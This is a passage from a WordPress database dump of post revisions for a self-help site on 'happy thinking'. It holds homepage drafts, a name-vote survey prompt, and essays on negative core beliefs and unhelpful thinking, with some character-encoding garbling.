(1976, 1, '2023-06-27 06:16:33', '2023-06-27 06:16:33', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Here is a small message from the author of this website: I would be grateful before you proceed, if you will answer this one question survey that will take you only a few seconds. I am planning to make a new website about a wise monk giving advice to a person on how to be happy. I need to choose a nice name for the website and to help me decide, I will be grateful if will click on one of the website names in the list below that you think is best. Then click "vote" and your choice will be anonymously recorded. This will really help me to decide on which name to use. Thank you for your kind help. You can proceed to visit the whole website after the survey. No more surveys or advertisements!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-06-27 06:16:33', '2023-06-27 06:16:33', '', 1910, 'https://www.happythinking.com/?p=1976', 0, 'revision', '', 0),
(1978, 1, '2023-06-27 06:56:02', '2023-06-27 06:56:02', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":1977,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking270623.jpg" alt="" class="wp-image-1977"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website, I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind. I will also share with you various mental methods that will help you to change negative thinking into more positive ways of thinking. These methods will be very practical so that you can use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1910} /-->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-27 06:56:02', '2023-06-27 06:56:02', '', 88, 'https://www.happythinking.com/?p=1978', 0, 'revision', '', 0),
(1816, 1, '2023-06-13 19:34:22', '2023-06-13 19:34:22', '<!-- wp:paragraph -->\n<p>First of all, let me make it clear that when I talk about â€œbeliefsâ€, I certainly do not mean religious beliefs! Rather, it is about the beliefs one has about oneself, other people, and the world. For example, regarding oneself, one might have the belief, â€œI am caringâ€. Regarding others, one might have the belief, â€œPeople are selfishâ€ and regarding the world, one might have the belief, â€œThere are a lot of dangers out there.â€ Such beliefs are central to a person''s view of everything within and outside, and for this reason, are called â€œcore beliefsâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When one is born, oneâ€™s mind essentially has no beliefs about anything. However, from that blank state onwards, one starts to form beliefs about various things. For example, even as a baby, one would learn which faces belong to those that will cuddle and give nourishment and which faces belong to those who provide no benefit. I.e. one forms certain beliefs about who is â€œgoodâ€ for oneâ€™s survival and who is â€œbadâ€. As oneâ€™s childhood years progress, one''s brain continually updates oneâ€™s core beliefs.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Core beliefs are the driving force of a person, and one''s mind tries its best to think in ways that support such core beliefs. I call thoughts that support oneâ€™s core beliefs, â€œsupporting thoughtsâ€. For example, imagine that a person has the core belief, â€œI can learn new thingsâ€. For this core belief, one of the supportive thoughts might be, â€œIf I have an opportunity to learn new things, I should take up that opportunityâ€. Letâ€™s take another example, where a person, who we will call Sujith, has the core belief, â€œI have good leadership skillsâ€. Now suppose Sujith, at a social event, meets an owner of a major company and that person offers Sujith a very attractive job as a manager. In this situation, Sujithâ€™s mind may develop the supporting thought, â€œI have the skills that will help me to do well in this new job, therefore I should accept itâ€, prompting him to take up that offer. However, let us now imagine that Sujith''s mind has the opposite core belief, â€œI have poor leadership skillsâ€. In this scenario, if he was offered the same job, his mind might have the supporting thought, â€œYou have useless leadership skills and you will therefore fail in this new jobâ€, prompting him to refuse the job offer. The supporting thoughts blindly support one''s core beliefs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As core beliefs direct almost all aspects of oneâ€™s life, itâ€™s very important that one has core beliefs that truly represent oneself. You may now wonder how one can have core beliefs that do not truly represent oneself. Unfortunately, this can happen quite easily and I will explain how. As mentioned before, core beliefs start to form in oneâ€™s childhood, which is a time when oneâ€™s mind is not fully developed and is quite immature. This can lead to one having core beliefs that may not be truly logical. For example, imagine that a small child is with her mother, who is quite preoccupied with some pressing issue. As they walk in the park, imagine that the mother buys ice cream for her child. Unfortunately, a few minutes later, imagine that the child accidentally drops the ice cream, and the mother, in a lapse of concentration, says, â€œYou are stupidâ€. While an adult in this situation would not consider herself to be seriously stupid just because one drops an ice cream, for a child, who does not have the mental maturity of an adult, this event, coming from her mother who she values, may be taken seriously, and lead to the formation of the negative core belief, â€œI am stupidâ€. Now you might say, â€œSurely, when this child grows up, she would replace this with a more realistic core belief, such as â€œI am not stupid.â€ Unfortunately, things are not all that logical when it comes to the mind! What can happen is that some childhood core beliefs can remain unchanged in the mind and persist into adulthood. This can happen because oneâ€™s mind may have not â€œbotheredâ€ to challenge those beliefs with new, more logical adult thinking. Such unchallenged negative core beliefs that persist into adulthood can cause harm. In the example of the child with the negative core belief, â€œI am stupidâ€, if this is not challenged with new thinking (i.e. adult logic), the adult may well continue with the same negative core belief, and that may well limit the potential of this adult. For example, this unchallenged negative core belief may well dissuade the adult from pursuing a university education. This would be a pity, because this negative core belief may well be untrue, and the person may well have flourished in university.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Such unchallenged negative core beliefs may remain quietly in the background, and get activated at only certain times. For example, continuing with the ice cream example, the adult person may not be always thinking â€œI am stupid.â€ But say, when this person thinks about applying for a university education, the â€œI am stupidâ€ negative core belief may surface at that moment, and dissuade the person from continuing.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Core beliefs can sometimes be difficult to discover as they may lie in the background. However, you will recall that the mind also has â€œsupporting thoughtsâ€, that support core beliefs. If you cannot work out your core beliefs, you may be able to recognise the supporting thoughts instead. For example, when thinking about higher education, you may not recognise the negative core belief â€œI am stupidâ€, but instead, recognise the supporting thought, â€œI should not apply to university, as I will surely fail if I enrolled in one.â€ Such supporting thoughts that support untrue negative core beliefs can unnecessarily negatively affect your life. Analysing oneâ€™s negative thinking patterns can suggest the hidden negative core beliefs in a person.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can imagine, unchallenged core beliefs can unnecessarily limit a person''s potential. One goal of happy thinking is of course to deal with such beliefs. However, we will keep that for later on the website, when we discuss various psychological tools that you can use to access and change core beliefs. For now, just remember the basic concept of core beliefs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/all-or-nothing-thinking/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/no-gratitude/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Negative core beliefs', '', 'inherit', 'closed', 'closed', '', '1632-revision-v1', '', '', '2023-06-13 19:34:22', '2023-06-13 19:34:22', '', 1632, 'https://www.happythinking.com/?p=1816', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(2000, 1, '2023-07-02 11:53:56', '2023-07-02 11:53:56', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>To access this website for free, please answer this simple one question survey: For a website about a wise monk giving advice to a person on how to be happy, which name below is better? Select the website name below that you think is best, and continue. I promise there will be no more surveys or advertising!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-07-02 11:53:56', '2023-07-02 11:53:56', '', 1910, 'https://www.happythinking.com/?p=2000', 0, 'revision', '', 0),
(1973, 1, '2023-06-26 10:49:27', '2023-06-26 10:49:27', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>We are planing to make a website about a wise monk advising a person on how to be happy. We need to choose a nice name. To help us decide, we will be grateful if will click on one of the website names below that you think is best. Then click vote and your choice will be anonymously recorded and will help us decide on which name to use.Thank you for your kind help .</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-06-26 10:49:27', '2023-06-26 10:49:27', '', 1910, 'https://www.happythinking.com/?p=1973', 0, 'revision', '', 0),
(1974, 1, '2023-06-26 19:45:42', '2023-06-26 19:45:42', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>This website is completely free and without advertisements, however, I would be grateful before you proceed, if you will answer this one question survey that will take you only a few seconds. We are planning to make a new website about a wise monk giving advice to a person on how to be happy. We need to choose a nice name for the website and to help us decide, we will be grateful if will click on one of the website names in the list below that you think is best. Then click vote and your choice will be anonymously recorded. This will really help us decide on which name to use. Thank you for your kind help.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-06-26 19:45:42', '2023-06-26 19:45:42', '', 1910, 'https://www.happythinking.com/?p=1974', 0, 'revision', '', 0),
(1963, 1, '2023-06-26 06:49:42', '2023-06-26 06:49:42', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>This website about how to be happy is completely free. However, we are planning another website, about a story where a wise monk guides a person to find happiness. We have bought the website names below but not sure which is best. Grateful before you proceed, if you can help us choose what you think is a nicer name. It will really help us to decide. Thank you!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-06-26 06:49:42', '2023-06-26 06:49:42', '', 1910, 'https://www.happythinking.com/?p=1963', 0, 'revision', '', 0),
(1979, 1, '2023-06-27 18:29:28', '2023-06-27 18:29:28', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":1977,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking270623.jpg" alt="" class="wp-image-1977"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website, I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind. I will also share with you various mental methods that will help you to change negative thinking into more positive ways of thinking. These methods will be very practical so that you can use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-27 18:29:28', '2023-06-27 18:29:28', '', 88, 'https://www.happythinking.com/?p=1979', 0, 'revision', '', 0),
(1964, 1, '2023-06-26 06:51:01', '2023-06-26 06:51:01', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":1937,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking_210623a.jpg" alt="" class="wp-image-1937"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website, I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind. I will also share with you various mental methods that will help you to change negative thinking into more positive ways of thinking. These methods will be very practical so that you can use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1910} /-->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-26 06:51:01', '2023-06-26 06:51:01', '', 88, 'https://www.happythinking.com/?p=1964', 0, 'revision', '', 0),
(1561, 1, '2023-05-21 16:19:52', '2023-05-21 16:19:52', '<!-- wp:columns {"align":"full"} -->\n<div class="wp-block-columns alignfull"><!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"50%"} -->\n<div class="wp-block-column" style="flex-basis:50%"><!-- wp:image {"id":1251,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image size-full"><img src="https://www.happythinking.com/wp-content/uploads/2021/08/home_stupid300821.gif" alt="" class="wp-image-1251"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy and it is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc).&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The human mind â€œthinksâ€ in extremely complex ways and in many ways that is what makes all of us amazingly different from each other. The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Unfortunately, over time, oneâ€™s mind may develop certain â€œunhelpfulâ€ ways of thinking that can negatively affect oneâ€™s mental wellbeing.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The aim of this website is to help you to recognise unhelpful ways of thinking when it happens in your mind and to show you practical ways to prevent such thinking from affecting you in a negative way.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>test<a href="https://www.happythinking.com/unhelpful_thinking/">Unhelpful thinking</a></p>\n<!-- /wp:paragraph -->', 'How to change unhelpful ways of thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-05-21 16:19:52', '2023-05-21 16:19:52', '', 88, 'https://www.happythinking.com/?p=1561', 0, 'revision', '', 0),
(1539, 1, '2023-04-10 10:34:40', '2023-04-10 10:34:40', '<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Home</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.stopstupidthinking.com/confirmation_bias/" style="border-radius:15px">Click for next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->', 'home_next', '', 'inherit', 'closed', 'closed', '', '1346-revision-v1', '', '', '2023-04-10 10:34:40', '2023-04-10 10:34:40', '', 1346, 'https://www.happythinking.com/?p=1539', 0, 'revision', '', 0),
(1540, 1, '2023-04-10 10:35:08', '2023-04-10 10:35:08', '<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Home</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click for next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->', 'home_next', '', 'inherit', 'closed', 'closed', '', '1346-revision-v1', '', '', '2023-04-10 10:35:08', '2023-04-10 10:35:08', '', 1346, 'https://www.happythinking.com/?p=1540', 0, 'revision', '', 0),
(1607, 1, '2023-05-30 17:06:16', '2023-05-30 17:06:16', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were â€œhelpfulâ€ as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was â€œunhelpfulâ€ and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise unhelpful thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. I have divided this website about Happy Thinking into two main parts:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy to understand way, common types of unhelpful thinking. This will help you to recognise such thinking when it happens in your mind.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various special techniques that your mind can use to either change unhelpful thinking or help prevent such thinking from affecting you in a negative way. I like to think of such techniques, as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with unhelpful thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing unhelpful thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in essence, â€˜happy thinkingâ€ is about you recognising unhelpful thinking when it occurs in your mind and then using one or more tools to deal with such thinking. This along with a sprinkling of wisdom, should make you a happy person! I truly believe that you will enjoy and benefit from â€œHappy Thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1346} /-->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-05-30 17:06:16', '2023-05-30 17:06:16', '', 1034, 'https://www.happythinking.com/?p=1607', 0, 'revision', '', 0),
(1545, 1, '2023-04-10 12:25:44', '2023-04-10 12:25:44', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œhappy thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph 